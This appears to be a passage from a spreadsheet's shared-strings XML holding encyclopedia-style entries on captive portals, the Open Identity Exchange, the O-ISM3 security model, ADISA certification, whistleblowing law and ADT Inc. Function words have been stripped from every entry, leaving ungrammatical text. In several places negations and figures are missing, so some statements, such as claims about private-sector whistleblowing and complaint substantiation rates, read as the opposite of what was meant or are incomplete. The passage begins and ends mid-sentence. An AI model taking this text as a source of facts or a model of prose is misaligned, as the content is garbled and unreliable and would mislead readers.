internet, users first email client application relies internet find connection working without explanation, need open browser validate. this problematic users browser installed operating system. however sometimes possible email facilities rely (e.g. application specifies connection rather hostname). similar problem occur client uses ajax joins network pages already loaded browser, causing undefined behavior (for example, corrupt messages appear) page tries http requests origin server. similarly, https connections cannot redirected least without triggering security warnings), browser attempts access secure websites authorized captive portal attempts fail without explanation (the usual symptom intended website appears inaccessible). platforms wi-fi tcp/ip stack browser supports https cannot many captive portals. such platforms include nintendo running game uses nintendo wi-fi connection. non-browser authentication possible using wispr, xml-based authentication protocol purpose, mac-based authentication authentications based protocols. also possible platform vendor enter service contract operator large number captive portal hotspots allow free discounted access platform vendor's servers hotspot's walled garden. example, 2005 nintendo wayport partnered provide free wi-fi access nintendo users certain mcdonald's restaurants. also, voip ports could allowed bypass gateway allow phones work. also http proxy proximity marketing mobile location analytics references external links android captive portal setup 7710 captive-portal identification using dhcp router advertisements (ras)</t>
  </si>
  <si>
    <t>Open Configuration and Management Layer</t>
  </si>
  <si>
    <t>open configuration management layer (ocml) universal application configuration management layer helps develop integrated applications independent underlying group applications, configurations management. products using ocml fossmart mail guardian fosswall unified threat management system references</t>
  </si>
  <si>
    <t>Open Identity Exchange</t>
  </si>
  <si>
    <t>open identity exchange (oix) membership organisation works accelerate adoption digital identity services based open standards. non-profit organisation technology agnostic. collaborative, works across private public sectors. members work together jointly fund participate pilot projects (sometimes referred alpha projects). these pilots test business, legal and/or technical concepts theory interoperability real world cases. white paper published every project. history genesis shortly coming office, obama administration asked u.s. general services administration (gsa) leverage open identity technologies allow american public easily, efficiently, safely interact federal websites national institute health (nih), social security administration (ssa), internal revenue service (irs). 2009 conference, sought build public/private partnership open foundation (oidf) information card foundation (icf) order craft workable identity information framework would establish legal policy precedents needed establish trust open transactions. partnership eventually developed trust framework model, described below. further meetings held internet identity workshop november 2009, resulted oidf forming joint steering committee. committee's task study best implementation options newly created framework. foundation chief information officer recommended formation non-profit corporation, open identity exchange (oix). january 2010, oidf approved grants fund creation open identity exchange. first trust framework provider certified government. booz allen hamilton, technologies, equifax, google, paypal, verisign, verizon members either oidf icf, agreed become founding members oix. launch open identity exchange publicly launched 2010 addressed increasing challenges building trust online identity outlined below: relying parties must able trust identity provider providing accurate data identity providers must able trust relying party legitimate (i.e. hacker, phisher, etc.) direct relying parties identity provider trust agreements common solution, impossible manage internet scalein 2012 executive director position founded national strategy trusted identities cyberspace (nstic) pilot projects showed growing proof traction increased awareness attention. 2012 formed throughout 2013 initial cabinet office identity assurance programme (idap) pilots launched white papers published. oixnet 2014, established oixnet trust registry, global authoritative registry business, legal technical requirements needed ensure market adoption global interoperability.in 2014, oidf also announced plans register companies self-certifying conformance openid connect openid certification program oixnet. purpose official online publicly-accessible repository documents information relating identity systems identity system participants. referred “registry”, functions official centralized source documents information, much like government-operated recorder deeds. that individuals entities register documents information oixnet registry provide notice contents public, members public seeking access documents information single authoritative location find them. oixnet registry designed provide single comprehensive authoritative location documents information relating specific purpose case, identity systems) safely stored purpose putting others notice certain facts, documents information accessed interested stakeholders seeking information. early participants oixnet launched 2015. openid foundation first registrant registering initial organizations, including google, forgerock, microsoft, nri, paypal ping identity, certifying conformance openid connect. additional registrations added oixnet throughout 2015 2016 trusted identity services currently registered. status oixnet registry currently pilot 2016 registering diverse trust frameworks communities interest. international chapters developed chapters policy 2015 allows regional chapters established. 2016 united kingdom chapter approved board launched. leadership board represents leaders online identity internet, telecom data aggregation industries concerned market expansion information security. government relations board howard schmidt 2011 discuss public–private partnership envisioned nstic strategy. government's cabinet office joined board level, began work identity assurance programme gov.uk verify.the states jersey joined 2015 could leverage knowledge gained development government identity assurance programme hasten adaptation adoption jersey. membership open identity exchange currently thirteen executive members general members november 2016. europe chapter beginning 2015 cabinet office requested open identity exchange begin process exploring legal, business pragmatic considerations creating self-sustaining ‘chapter’ open identity exchange. point operated independent entity able administer ‘directed funding’ member organisations. received series grants cabinet office used collaboratively funded projects. ad-hoc board advisers formed independent, experienced, public private sector leaders addressed policy considerations transition process. addition considering role future, board advisers considered private sector's needs identity services, resulting ongoing project.the open identity exchange board directors approved chapters policy 2015, allowing formation individual chapters affiliated various local markets. april 2016 europe chapter appointed board directors. white papers white papers deliver joint research examine wide range challenges facing open identity market provide possible solutions. they written experts fields technology, particularly open identity. oix: open market solution online identity assurance trust frameworks trust framework requirements guidelines personal network: trust model business model personal data federated online attribute exchange initiatives personal levels assurance (ploa) three pillars trust identity assurance programme (idap) overview legal liability idap development) national strategy trusted identities cyberspace (nstic) comments u.s. nstic steering group draft charter related governance issues united states national strategy trusted identities cyberspace identity ecosystem steering committee plenary governing board charter response "models governance structure national strategy trusted identity cyberspace" white papers published 2016 open identity exchange (oix) white papers focus current issues opportunities emerging identity markets. white papers intended deliver value identity ecosystem take perspectives: retrospective report outcome given project pilot prospective discussion current issue opportunity. white papers authored independent domain experts intended summaries general business audience. recent published whitepapers include: online activity part identity verification private sector needs identity assurance digital identity peer-to-peer economy• shared signals proof concept• creating digital identity jersey just giving gov.uk verify creating pensions dashboard could digital identities help transform consumers attitudes behavior towards savings?• digital identity across borders: opening bank account another country generating revenue subscriber benefits: analysis arpu identity projects projects deliver joint research examine wide range challenges facing open identity market provide possible solutions. states jersey: creating digital hypothesis government identity assurance model could adapted jersey support certified idps potential identity assurance providers, meet requirements soj. hypothesis also considered would create attractive market opportunity jersey providers. lightest project this 3-year project started september 2016 partially funded european union horizon 2020 research innovation programme g.a, 700321. lightest consortium consists partners european countries coordinated fraunhofer-gesellschaft. project looks reach beyond europe, build global community. lightest (lightweight infrastructure global heterogeneous trust management support open ecosystem stakeholders trust schemes) objective lightest create global cross-domain trust infrastructure renders transparent easy verifiers evaluate electronic transactions. querying different trust authorities worldwide combining trust aspects related identity, business, reputation etc. become possible conduct domain-specific trust decisions. this achieved reusing existing governance, organization, infrastructure, standards, software, community, know-how existing domain name system, combined innovative building blocks. this approach allows efficient global rollout solution assists decision makers trust decisions. integrating mobile identities scheme, lightest also enables domain-specific assessments levels assurance identities. gov.uk verify government, cabinet office joined board level, began work identity assurance programme (idap). through directed funding programme, considerable number projects continue carried governance, results helped ongoing development gov.uk verify. work continues looks digital identities used public private sector. gov.uk verify built maintained government digital service (gds), part cabinet office. government committed expanding gov.uk verify helping grow market identity assurance able meet user needs relation central government services, well local, health private sector services. gov.uk verify uses certified companies verify identity government. certified company private company works high industry government standards verify identity. references external links official website oixnet</t>
  </si>
  <si>
    <t>Open Information Security Maturity Model</t>
  </si>
  <si>
    <t>open group information security management maturity model (o-ism3) open group framework managing information security. aims ensure security processes organization implemented operate level consistent organization’s business requirements. o-ism3 defines comprehensive manageable number information security processes sufficient needs organizations, relevant security control(s) identified within process essential subset process. history original motivation behind o-ism3 development narrow theory practice information security management systems, trigger idea linking security management maturity models. o-ism3 strove keep clear number pitfalls previous approaches.the "project". looked capability maturity model integration, 9000, cobit, itil, iso/iec 27001:2013, standards, found potential improvement several fields, linking security business needs, using process based approach, providing additional details (who, what, why) implementation, suggesting specific metrics, preserving compatibility popular security management standards. availability open group provides standard "o-ism3 v.20". free charge. references</t>
  </si>
  <si>
    <t>ADISA certification</t>
  </si>
  <si>
    <t>founded 2010, adisa certification limited (formerly called asset disposal information security alliance) certification body companies provide asset disposal services manufacturers developers software hardware data sanitation solutions.the adisa asset recovery standard (for service providers) industry standard. audit team, based hertfordshire, performed audits counties since inception. july 2021, adisa asset recovery standard formally approved information commissioner's office gdpr certification scheme.in 2019, adisa brought forensic testing house launched adisa research centre (arc). delivers product certification schemes software hardware data sanitization tools. adisa product claims product assurance schemes different levels product testing data sanitization tools. product claims test (pct) scientifically evaluates claim behind data sanitization capabilities software hardware device determine validity. product assurance test offers higher level assurance pct; requires larger sample size forensically analyzed measures vendors software hardware device range requirements.adisa 2020 computer security magazine "one watch" award follow previous wins including 2019 "computer security compliance company year" award training provider year (2015). adisa standard recognized industry standard merit defence infosec product co-operation group (dipcog) listed national cyber security centre's guidance companies disposing assets.adisa owns youtube channel called "adisa media centre" provide information group various formats. also computer recycling data remanence electronic waste sanitization (classified information) references</t>
  </si>
  <si>
    <t>Whistleblower</t>
  </si>
  <si>
    <t>whistleblower (also written whistle-blower whistle blower) person, often employee, reveals information activity within private public organization deemed illegal, immoral, illicit, unsafe fraudulent. whistleblowers variety internal external channels communicate information allegations. over whistleblowers report internally supervisor, human resources, compliance, neutral third party within company, hoping company address correct issues. whistleblower also bring allegations light communicating external entities, media, government, enforcement. whistleblowing occur either private sector public sector. retaliation real risk whistleblowers, often heavy price blowing whistle. common form retaliation abrupt termination employment. however, several actions also considered retaliatory, including extreme increases workloads, hours drastically, preventing task completion, bullying. laws many countries attempt protect whistleblowers regulate whistleblowing activities. these laws tend adopt different approaches public private sector whistleblowing. whistleblowers always achieve aims. claims credible successful, must compelling evidence support claims government regulating body investigate "prove" claims hold corrupt companies and/or government agencies account. overview origin term u.s. civic activist ralph nader said coined phrase early 1970s order avoid negative connotations found words "informer" "snitch". however, origins word date back 19th century. word linked whistle alert public crowd problems commission crime breaking rules game. phrase whistle blower attached enforcement officials 19th century used whistle alert public fellow police. sports referees, whistle indicate illegal foul play, also called whistle blowers.an 1883 story janesville gazette called policeman used whistle alert citizens riot whistle blower, without hyphen. year 1963, phrase become hyphenated word, whistle-blower. word began used journalists 1960s people revealed wrongdoing, nader. eventually evolved compound word whistleblower. channels whistleblowing internal channels most whistleblowers internal whistleblowers, report misconduct fellow employee superior within company anonymous reporting mechanisms often called hotlines. interesting questions respect internal whistleblowers circumstances people either spot stop illegal otherwise unacceptable behavior report there reasons believe people likely take action respect unacceptable behavior, within organization, complaint systems offer options dictated planning control organization, choice options absolute confidentiality.anonymous reporting mechanisms, mentioned previously, help foster climate whereby employees likely report seek guidance regarding potential actual wrongdoing without fear retaliation. coming anti-bribery management systems standard, 37001, includes anonymous reporting criteria standard. external channels external whistleblowers, however, report misconduct outside people entities. cases, depending nature information, whistleblowers report misconduct lawyers, media, enforcement watchdog agencies, local, state, federal agencies. cases, external whistleblowing encouraged offering monetary rewards. third party channels sometimes organizations external agencies create secure anonymous reporting channel employees, often referred whistleblowing hotline. well protecting identity whistleblower, services designed inform individuals organizational pyramid misconduct, usually integration specialised case management software. implementing third party solution often easiest organization promote compliance, offer whistleblowing policy previously exist. increasing number companies authorities third party services whistleblower anonymous also towards third party service provider, made possible toll free phone numbers and/or app-based solutions apply asymmetrical encryption. private versus public sectors private sector whistleblowing private sector whistleblowing arguably prevalent suppressed society today. example private sector whistleblowing employee reports someone higher position manager, external actors, lawyer police. whistleblowing private sector typically high-profile openly discussed major news outlets, though occasionally, third parties expose human rights violations exploitation workers.many governments attempt protect whistleblowers. united states, example, organizations united states department labor (dol), laws sarbanes-oxley united states federal sentencing guidelines organizations (fsgo) protect whistleblowers private sector. thus, despite government efforts help regulate private sector, employees must still weigh options. they either expose company stand moral ethical high ground; expose company, lose job, reputation potentially ability employed again. according study university pennsylvania, three hundred whistleblowers studied, sixty nine percent foregone exact situation; either fired forced retire taking ethical high ground. outcomes like makes much harder accurately track prevalent whistleblowing private sector. public sector whistleblowing recognition value public sector whistleblowing growing last years. united states, example, state federal statutes place protect whistleblowers retaliation. united states supreme court ruled public sector whistleblowers protected retaliation first amendment rights. after many federal whistleblowers covered high-profile media cases, laws finally introduced protect government whistleblowers. these laws enacted help prevent corruption encourage people expose misconduct, illegal, dishonest activity good society. people choose whistleblowers often suffer retaliation employer. they likely fired at-will employee, means fired without reason. there exceptions place whistleblowers at-will employees. even without statute, numerous decisions encourage protect whistleblowing grounds public policy. statutes state employer shall take adverse employment actions employee retaliation good-faith report whistleblowing action cooperating investigation, proceeding, lawsuit arising said action. federal whistleblower legislation includes statute protecting government employees. federal civil service, government prohibited taking, threatening take, personnel action employee employee disclosed information reasonably believed showed violation law, gross mismanagement, gross waste funds, abuse authority, substantial specific danger public safety health. prevail claim, federal employee must show protected disclosure made, accused official knew disclosure, retaliation resulted, genuine connection retaliation employee's action. risks individual harm, damage public trust, threats national security three categories harm come result whistleblowing. revealing whistleblower's identity automatically life danger. some media outlets associate words like "traitor" "treason" whistleblowers, many countries around world, punishment treason death penalty, even whoever allegedly committed treason caused anyone physical harm. instances, whistleblowers must flee country avoid public scrutiny, threats death physical harm, cases criminal charges. whistleblowers often protected employer retaliation, many cases punishment occurred, termination, suspension, demotion, wage garnishment, and/or harsh mistreatment employees. 2009 study found whistleblowers experienced professional retaliation form, including wrongful termination. following dismissal, whistleblowers struggle find employment damaged reputations, poor references blacklisting. socioeconomic impact whistleblowing loss livelihood family strain also impact whistleblowers' psychological well being. whistleblowers often experience immense stress result litigation regarding harms unfair dismissal, often face little support unions. whistleblowers continue pursue concerns also face long battles official bodies regulators government departments. such bodies reproduce "institutional silence" adopted employers, adding whistleblowers' stress difficulties. thus, whistleblowers often suffer great injustice never acknowledged rectified.in cases, however, harm done whistleblower innocent people. whistleblowers make unintentional mistakes, investigations tainted fear negative publicity. example occurred canadian health ministry, employee wrongly concluded nearly every research contract 2012 involved malfeasance. result sudden firing seven people, false public threats criminal investigation, death researcher suicide. government ultimately paid victims millions dollars lost pay, slander, harms, addition $2.41 million spent subsequent 2015 investigation false charges. attitudes toward whistleblowers whistleblowers seen selfless martyrs public interest organizational accountability; others view "traitors" "defectors". some even accuse solely pursuing personal glory fame, view behavior motivated greed cases. culturally still connotations betrayal, ‘snitching’ level ‘denunciations’ other. speaking difficult, especially culture promoted even actively discouraged. some academics (such thomas faunce) feel whistleblowers least entitled rebuttable presumption attempting apply ethical principles face obstacles whistleblowing would respected governance systems firmer academic basis virtue ethics.it likely many people even consider blowing whistle, fear retaliation, also fear losing relationships work outside work.persecution whistleblowers become serious issue many parts world: employees academia, business government might become aware serious risks health environment, internal policies might pose threats retaliation report early warnings. private company employees particular might risk fired, demoted, denied raises bringing environmental risks attention appropriate authorities. government employees could similar risk bringing threats health environment public attention, although perhaps less likely. there examples "early warning scientists" harassed bringing inconvenient truths impending harm notice public authorities. there also cases young scientists discouraged entering controversial scientific fields fear harassment.in order help whistleblowers, private organizations formed whistleblower legal defense funds support groups. examples include national whistleblowers center united states, whistleblowers public concern work (pcaw) united kingdom. depending circumstances, uncommon whistleblowers ostracized co-workers, discriminated future potential employers, even fired organization. this campaign directed whistleblowers goal eliminating organization referred mobbing. extreme form workplace bullying wherein group targeted individual. psychological impact there limited research psychological impacts whistle blowing. however, poor experiences whistleblowing cause prolonged prominent assault upon well whistleblower. workers attempt address concerns, often wall silence hostility management colleagues. depression often reported whistleblowers, suicidal thoughts occur 10%. general deterioration health self care described. range symptomatology shares many features posttraumatic stress disorder, though debate whether trauma experienced whistleblowers meets diagnostic thresholds. increased stress related physical illness also described whistleblowers.the stresses involved whistleblowing huge deter whistleblowing fear failure reprisals. some whistleblowers speak overwhelming persistent distress, drug alcohol problems, paranoid behaviour work, acute anxiety, nightmares, flashbacks intrusive thoughts. this fear indeed justified, individual feels threatened whistleblowing, plan career destruction 'complainant' reporting fictitious errors rumours. this technique, labelled "gaslighting", common approach used organizations manage employees cause difficulty raising concerns. extreme cases, technique involves organization manager proposing complainant's mental health unstable. organizations also often attempt ostracise isolate whistleblowers undermining concerns suggesting groundless, carrying inadequate investigations ignoring altogether. whistleblowers also disciplined, suspended reported professional bodies upon manufactured pretexts.such extreme experiences threat loss inevitably cause severe distress sometimes mental illness, sometimes lasting years afterwards. this mistreatment also deters others coming forward concerns. thus, poor practices remain hidden behind wall silence, prevent organization experiencing improvements afforded intelligent failure. some whistleblowers break ranks organizations mental stability questioned, adrian schoolcraft, nypd veteran alleged falsified crime statistics department forcibly committed mental institution. conversely, emotional strain whistleblower investigation devastating accused's family. ethics 'ethics' moral principles govern person's group's behavior. deeper questions theories whistleblowing people choose studied ethical approach. whistleblowing topic several myths inaccurate definitions. leading arguments ideological camp, maintain whistleblowing basic ethical traits simply telling truth stop illegal harmful activities, fraud government/taxpayers. opposite camp, many corporations corporate government leaders whistleblowing disloyal breaching confidentiality, especially industries handle sensitive client patient information. hundreds laws grant protection whistleblowers, stipulations easily cloud protection leave whistleblowers vulnerable retaliation, sometimes even threats physical harm. however, decision action become complicated recent advancements technology communication.the ethical implications whistleblowing negative well positive. some argued public sector whistleblowing plays important role democratic process resolving principle agent problems. however, sometimes employees blow whistle revenge. rosemary o'leary explains short volume topic called guerrilla government. "rather acting openly, guerrillas often choose remain closet", moving clandestinely behind scenes, salmon swimming upstream current power. over years, learned motivations driving guerrillas diverse. reasons acting range altruistic (doing right thing) seemingly petty passed promotion). taken whole, acts inspiring saving human lives love humanity trifling slowing issuance report spite anger." example, 1,000 whistleblower complaints filed year pentagon's inspector general, percent substantiated. believed throughout professional world individual bound secrecy within work sector. discussions whistleblowing employee loyalty usually assume concept loyalty irrelevant issue commonly, whistleblowing involves moral choice pits loyalty employee owes employer employee's responsibility serve public interest. robert larmer describes standard view whistleblowing journal business ethics explaining employee possesses prima facie (based first impression; accepted correct proved otherwise) duties loyalty confidentiality employers whistleblowing cannot justified except basis higher duty public good. important recognize relationship demands loyalty relationship works ways involves mutual enrichment.the ethics edward snowden's actions widely discussed debated news media academia worldwide. edward snowden released classified intelligence american people attempt allow americans inner workings government. person diligently tasked conundrum choosing loyal company blow whistle company's wrongdoing. discussions whistleblowing generally revolve around three topics: attempts define whistleblowing precisely, debates whether whistleblowing permissible, debates whether obligation blow whistle. motivations many whistleblowers stated motivated take action unethical practices, witnessing injustices businesses organizations. 2009 study found whistleblowers often motivated take action notice sharp decline ethical practices, opposed gradual worsening. there generally metrics whistleblowers determine practice unethical. first metric involves violation organization's bylaws written ethical policies. these violations allow individuals concretize rationalize blowing whistle. hand, "value-driven" whistleblowers influenced personal codes ethics. cases, whistleblowers criticized driven personal biases.in addition ethics, social organizational pressure motivating forces. 2012 study shows individuals likely blow whistle others know wrongdoing, fear consequences keeping silent. cases person responsible wrongdoing, whistleblower file formal report, rather directly confronting wrongdoer, confrontation would emotionally psychologically stressful. furthermore, individuals motivated report unethical behavior believe organizations support them. professionals management roles feel responsibility blow whistle uphold values rules organizations. legal protection whistleblowers legal protection whistleblowers varies country country depend country original activity, secrets revealed, eventually became published publicized. over dozen countries adopted comprehensive whistleblower protection laws create mechanisms reporting wrongdoing provide legal protections whistleblowers. over countries adopted limited protections part anti-corruption, freedom information, employment laws. purposes english wikipedia, section emphasizes english-speaking world covers regimes insofar represent exceptionally greater lesser protections. australia there laws number states. former police commissioner tony lauer summed official government police attitudes "nobody australia much likes whistleblowers, particularly organization like police government." former australian intelligence officer known witness provided evidence australia's controversial spying operation government east timor 2004, face possibility jail convicted.whistleblowers australia association exposed corruption form malpractice, especially hindered abused. canada public sector integrity commissioner (psic) provides safe confidential mechanism enabling public servants general public disclose wrongdoings committed public sector. also protects reprisal public servants disclosed wrongdoing cooperated investigations. office's goal enhance public confidence canada's federal public institutions integrity public servants.mandated public servants disclosure protection act, psic permanent independent agent parliament. act, came force 2007, applies federal public sector, approximately 400,000 public servants. this includes government departments agencies, parent crown corporations, royal canadian mounted police federal public sector bodies. disclosures lead investigation sets jurisdiction commissioner gives option investigate certain circumstances. hand, psic conducts investigation finds wrongdoing committed, commissioner must report findings discloser organization's chief executive. also, reports founded wrongdoing presented house commons senate accordance act. also established public servants disclosure protection tribunal (psdpt) protect public servants hearing reprisal complaints referred public sector integrity commissioner. tribunal grant remedies favour complainants order disciplinary action persons take reprisals. european union european parliament approved "whistleblower protection directive" containing broad free speech protections whistleblowers public private sectors, including journalists, member states european union. directive prohibits direct indirect retaliation employees, current former, public sector private sector. directive's protections apply employees, volunteers, assist them, including civil society organizations journalists report evidence. provides equal rights whistleblowers national security sector challenge denial removal security clearances. also, whistleblowers protected criminal prosecution corporate lawsuits damages resulting whistleblowing, provides psychological support dealing harassment stress.good government observers hailed directive setting "the global standard best practice rights protecting freedom speech counts most—challenging abuses power betray public trust," according u.s.-based government accountability project. they noted, however, ambiguities remain directive regarding application areas, "duty speech," employees report information course assignment, example, supervisor, instead whistleblowing formal dissent. fact, duty speech overwhelming majority whistleblowing information gets communicated, free flow information needed proper functioning organizations. however response "duty speech" employee communication vast majority retaliation employees occurs. these observers noted directive must understood applying protection retaliation duty speech without understanding directive "miss iceberg what's needed". france france, several laws, recent, established protection regime whistleblowers. prior 2016, several laws force created disparate legislation sector-specific regimes. 2016 transparency, fight corruption modernization economic life (known "sapin law") provides first time single legal definition whistleblowers france. defines individual discloses reports, disinterested manner good faith, crime offence, serious manifest breach international commitment duly ratified approved france, unilateral international organization adopted basis commitment, regulations, serious threat harm general interest, become personally aware of." excludes certain professional secrets national defense secrecy, medical secrecy secrecy relations lawyer client. 2022, laws passed transpose european directive 2019/1937 october 2019 protection persons report breaches union law. strengthens role défenseur droits french ombudsman tasked advising protecting whistleblowers. second amends sapin bring line directive adds substantial guarantees included directive among which: definition whistleblowing force ‘sapin includes work-based whistleblowing maintained. protection applies natural person facilitate assist whistleblowers required directive also entities trade unions facilitator. they offered level protection. military personnel afforded level protection civil servants, long disclose information harm national security. provides whistleblowers granted financial assistance, subjected suit, making application judge, power force organization suing employer instance provide cover legal fees and, relevant, cover living expenses financial situation deteriorated. provides whistleblowers shall incur criminal liability respect acquisition access information reported publicly disclosed. they cannot sentenced offenses committed order gather proof information long obtained lawful manner. strengthens existing sanctions retaliate whistleblowers criminal sanctions appliable persons retaliating whistleblowers three years imprisonment fine judges impose fines companies taking slapp action whistleblower.the allows person apply défenseur droits opinion status whistleblower. response given within months receiving application. organic provides défenseur droits publish report every years overall functioning whistleblower protection addressed french president republic, president national assembly president senate. jamaica jamaica, protected disclosures act, 2011 received assent march 2011. creates comprehensive system protection whistleblowers public private sector. based public interest disclosure 1998. india government india considering adopting whistleblower protection several years. 2003, commission india recommended adoption public interest disclosure (protection informers) act, 2002. august 2010, public interest disclosure protection persons making disclosures bill, 2010 introduced sabha, lower house parliament india. bill approved cabinet june 2011. public interest disclosure protection persons making disclosures bill, 2010 renamed whistleblowers' protection bill, 2011 standing committee personnel, public grievances, justice. whistleblowers' protection bill, 2011 passed sabha december 2011. rajyasabha february 2014. whistle blowers protection act, 2011 received presidential assent 2014 subsequently published official gazette government india 2014 ministry justice, government india. ireland government ireland committed adopting comprehensive whistleblower protection january 2012. protected disclosures (pda) passed 2014. covers workers public private sectors, also includes contractors, trainees, agency staff, former employees seekers. range different types misconduct reported law, provides protections workers range employment actions well whistleblowers' identity. netherlands netherlands measures place mitigate risks whistleblowing: house whistleblowers (huis voor klokkenluiders) offers advice support whistleblowers, parliament passed proposal 2016 establish house whistleblowers, protect severe negative consequences might endure (kamerstuk, 2013). dutch media organizations also provide whistleblower support; september 2013 number major dutch media outlets supported launch publeaks, provides secure website people leak documents media. publeaks designed protect whistleblowers. operates globaleaks software developed hermes center transparency digital human rights, supports whistleblower-oriented technologies internationally. switzerland swiss council states agreed draft amendment swiss code obligations september 2014. draft introduces articles 321abis 321asepties, 328(3), 336(2)(d). amendment article 362(1) adds articles 321abis 321asepties list provisions overruled labour bargaining agreements. article 321ater introduces obligation employees report irregularities employer reporting authority. employee will, however, breach duty good faith reports irregularity authority period employer longer days lapsed since employee reported incident employer, employer addressed irregularity obvious employer insufficiently addressed irregularity.article 321aquarter provides employee exceptionally directly report authority. exceptions apply cases employee position objectively demonstrate report employer prove ineffective, employee anticipate dismissal, employee must assume competent authority hindered investigating irregularity, direct serious hazard life, health, safety, environment.the draft improve protection dismissal employees report irregularities employer. amendment provide employees anonymously filing observations irregularities. united kingdom whistleblowing united kingdom protected public interest disclosure 1998 (pida). amongst things, protected disclosures permitted even non-disclosure agreement signed employer former current employee; consultation restricting confidentiality clauses held 2019.the freedom speak review principles bring improvements help whistleblowers nhs, including: culture raising concerns make raising issues part normal routine business well-led organization. culture free bullying freedom staff speak relies staff able work culture free bullying. training every member staff receive training trust's approach raising concerns receiving acting them. support trusts ensure dedicated person concerns easily reported without formality, "speak guardian" support find alternative employment worker raised concern cannot, result, continue role, help seek alternative job.monitor produced whistleblowing policy november 2015 organizations england obliged follow. explicitly says anyone bullying acting whistleblower could potentially liable disciplinary action. united states whistleblowing tradition would soon become united states start 1773 benjamin franklin leaking letters hutchinson affair. release communications royal governor thomas hutchinson thomas whately firing, duel arguably, many general impacts leak role convincing franklin join radicals' cause, taking another important final step toward american revolution. first continental congress favor later came called whistleblowing came 1777-8 case samuel shaw richard marven. seamen accused commander chief continental navy esek hopkins torturing british prisoners war. congress dismissed hopkins agreed cover defense cost pair hopkins filed libel suit imprisoned. shaw marven subsequently cleared jury trial. considered whistleblower united states, federal whistleblower statutes require federal employees reason believe employer violated law, rule, regulation; testify commence legal proceeding legally protected matter; refuse violate law. cases whistleblowing specified topic protected statute, u.s. courts generally held whistleblowers protected retaliation. however, closely divided u.s. supreme court decision, garcetti ceballos (2006) held first amendment free speech guarantees government employees protect disclosures made within scope employees' duties. united states, legal protections vary according subject matter whistleblowing, sometimes state case arises. passing 2002 sarbanes–oxley act, senate judiciary committee found whistleblower protections dependent "patchwork vagaries" varying state statutes. still, wide variety federal state laws protect employees call attention violations, help enforcement proceedings, refuse obey unlawful directions. while patchwork approach often criticized, also responsible united states dedicated whistleblowing laws country.the first adopted specifically protect whistleblowers 1863 united states false claims (revised 1986), tried combat fraud suppliers united states government american civil war. encourages whistleblowers promising percentage money recovered government protecting employment retaliation.another specifically protects whistleblowers lloyd–la follette 1912. guaranteed right federal employees furnish information united states congress. first environmental include employee protection clean water 1972. similar protections included subsequent federal environmental laws, including safe drinking water (1974), resource conservation recovery (1976), toxic substances control 1976, energy reorganization 1974 (through 1978 amendment protect nuclear whistleblowers), comprehensive environmental response, compensation, liability (cercla, superfund law) (1980), clean (1990). similar employee protections enforced osha included surface transportation assistance (1982) protect truck drivers, pipeline safety improvement (psia) 2002, wendell ford aviation investment reform 21st century ("air 21"), sarbanes–oxley act, enacted july 2002 (for corporate fraud whistleblowers). more recent laws whistleblower protection include patient protection affordable care ("aca", consumer product safety improvement ("cpsia"), seamans protection amended coast guard authorization 2010 ("spa"), consumer financial protection ("cfpa"), food safety modernization ("fsma"), moving ahead progress 21st century ("map-21"), taxpayer first ("tfa"). investigation retaliation whistleblowers federal statutes falls jurisdiction directorate whistleblower protection program united states department labor's occupational safety health administration (osha). whistleblower statutes enacted congress, enforced secretary labor, generally delegated secretary's order osha's directorate whistleblower protection program (dwpp). patchwork laws means victims retaliation need aware laws issue determine deadlines means making proper complaints. some deadlines short days (arizona state employees days file "prohibited personnel practice" complaint arizona state personnel board), others days. those report false claim federal government, suffer adverse employment actions result, years (depending state law) file civil suit remedies false claims (fca). under provision, "original source" report entitled percentage government recovers offenders. however, "original source" must also first file federal civil complaint recovery federal funds fraudulently obtained, must avoid publicizing claim fraud justice department decides whether prosecute claim itself. such lawsuits must filed seal, using special procedures keep claim becoming public federal government makes decision direct prosecution. espionage 1917 used prosecute whistleblowers united states including edward snowden chelsea manning. 2013, manning convicted violating espionage sentenced years prison leaking sensitive military documents wikileaks. year, snowden charged violating espionage releasing confidential documents belonging nsa.section dodd–frank wall street reform consumer protection (dodd-frank) united states incentivizes protects whistleblowers. dodd-frank, u.s. securities exchange commission (sec) financially rewards whistleblowers providing original information violations federal securities laws results sanctions least $1m. additionally, dodd-frank offers security whistleblowers illegalizing termination discrimination whistleblowing. whistleblower provision proven successful; enactment dodd-frank, charged (company) bluelinx holdings inc. (company) violating whistleblower protection rule 21f-17 employees sign confidentiality agreements threatened repercussions discussing internal matters outside parties. former président donald trump announced pl</t>
  </si>
  <si>
    <t>ADT Inc.</t>
  </si>
  <si>
    <t>inc., formerly corporation, american company provides residential, small large business electronic security, fire protection, related alarm monitoring services throughout united states. corporate head office located boca raton, florida. february 2016, company acquired apollo global management $6.9 billion leveraged buyout. history 1863, edward calahan invented stock ticker formed gold stock telegraph company 1867 exploit technology. gold stock also developed messenger system sent instructions stock exchange floor. three years later, president gold stock telegraph company woke burglar home, inspired create telegraph-based alert system. this system eventually connected neighbors central station alert boxes monitored. there many small telegraph delivery companies united states 19th century. 1874, district telegraph delivery companies affiliated became american district telegraph (adt). with increase telephone usage late 19th century, adt's messenger business slowly declined popularity. tried branching developing signaling business, still maintaining telegraph business primary income source. incorporated western union 1901 separated messenger business main signaling business time. 1909, western union came control american telephone telegraph company (at&amp;t). began expand areas, fire alarms security alarms 1910 1930, kept separate at&amp;t's holmes alarm business. became publicly traded company 1960s.in 1964, found monopoly restraint trade. shown provide almost central station alarm service united states. cities, york city memphis, tennessee, sole provider. they also found forced competitors business lowering prices cost. they would charge national accounts prices cities competitors much higher prices competition available. forced adopt national price list, could varied, help establish central station competitors cities without competition, fines triple damages federal government, customers, local competitors.in early 1987, firm hawley goodall, owned lord ashcroft, bought indianapolis-based crime control inc., fourth-largest company u.s. security market, million. later year, bought moved bermuda. this purchase transformed hawley leading security services business united states, resulted majority revenues coming north american market. result acquisition, hawley changed name limited decided refocus business around security services. 1987, company sold north american–based facility services business denmark's a/s. 1997, purchased tyco international reverse takeover. broadview security acquisition january 2010, tyco announced acquiring broadview security (formerly brinks home security) merging company division transaction valued $2.0 billion. 2008, brink's spun home security business, accounted brink's revenue year, separate publicly traded company. brinks home security rebranded broadview security 2009 massive advertising campaign. widely criticized unscrupulous, fear-mongering, exaggerating home security systems capable doing. unflattering parodies broadview's commercials, mocking company's attempts manipulate consumers, posted online, along filmed saturday night live sketch featuring andy samberg bill hader. acquisition broadview closed mid-2010, combined security companies north america, adding broadview's million customer accounts $565 million annual recurring revenue adt's existing customer base million accounts billion annual revenue. other acquisitions september 2011, tyco announced would split three companies, three. october 2012, debuted independent public company began trading york stock exchange (nyse: adt). 2014, acquired canadian company reliance protectron security services reliance home comfort.in february 2016, apollo global management acquired nearly billion merged another home 